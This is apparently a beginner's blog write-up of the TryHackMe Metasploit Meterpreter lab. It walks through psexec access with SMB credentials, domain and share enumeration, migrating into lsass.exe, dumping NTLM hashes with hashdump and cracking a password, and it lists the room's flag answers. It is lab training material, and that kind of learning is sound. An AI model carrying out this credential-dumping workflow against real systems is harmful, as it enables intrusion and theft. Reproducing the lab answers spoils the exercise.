Exploitation Basics: Metasploit: Meterpreter (TryHackMe)

Exploitation Basics: Metasploit: Meterpreter (TryHackMe)

·

3 min read

In this article, I will write a write-up for Metasploit: Meterpreter that covers the Introduction to Meterpreter, Meterpreter Flavors, Meterpreter Commands, Post-Exploitation with Meterpreter, and Post-Exploitation Challenge.

This room is still as changeable as the previous one as a beginner but what I’ve learned so far:

  • try and read through all areas

  • the specific module to be used or user/password would’ve been provided

  • if stuck always check if the question has a hint to help as a guide

  • cybersecurity entails a lot of research, and the use of tools like ChatGPT, and Microsoft Copilot for a better understanding of terms or finding commands.

  • The cybersecurity field is research-oriented, wide, and resourceful. Others have written write-ups and created YouTube channels, and communities, among others to help those who might be stuck while going through something they struggled with too, or as a way of giving back. We should also consider doing the same.

  • For this room, I was trying to do it on my own but when stuck I would follow this YouTube channel which does a walkthrough of this room.

To access the Meterpreter on the Attackbox we’ve been told to: - use exploit/windows/smb/psexec - set RHOSTS Target_IP_Address - show options - set MACHINE_IP - set SBMUser user_name - set SBMPass password

  1. What is the computer name? ACME-TEST

  2. What is the target domain? FLASH

run background command this will switch back to msf6 where we had the windows/smb/psexec modules. You will use post/windows/gather/enum_domain module as provided on then hint then run show options this brings up SESSIONthen run sessions to see the available sessions then set SESSION 1 then run or exploit this will show the Domain name

  1. What is the name of the share likely created by the user? speedster

based on the hint we have to use post/windows/gather/enum_shares then we set SESSION 1 and we run again

  1. What is the NTLM hash of the jchambers user?

based on the hint we need to migrate to pid of lsass.exe. So we use exploit/windows/smb/psexec then we exploit to get back to the Meterpreter. We will run ps to search for the process we want which is lsass.exe then we run migrate 772 and run hashdump command and you’ll see the result.

  1. What is the cleartext password of the jchambers user? Trustno1

use a Rainbow table like crackstation

  1. Where is the "secrets.txt" file located? (Full path of the file) c:\\Program Files (x86)\\Windows Multimedia Platform\\secrets.txt

use search -f secrets.txt command ``

  1. What is the Twitter password revealed in the "secrets.txt" file? KDSvbsw3849!

  2. Where is the "realsecret.txt" file located? (Full path of the file) c:\\inetpub\\wwwroot\\realsecret.txt

  3. What is the real secret? The Flash is the fastest man alive

Thank you for reading my article. Please leave any questions or comments on improving my learning journey and the THM challenges. We can also connect more on LinkedIn or X.

Did you find this article valuable?

Support Sharon Jebitok by becoming a sponsor. Any amount is appreciated!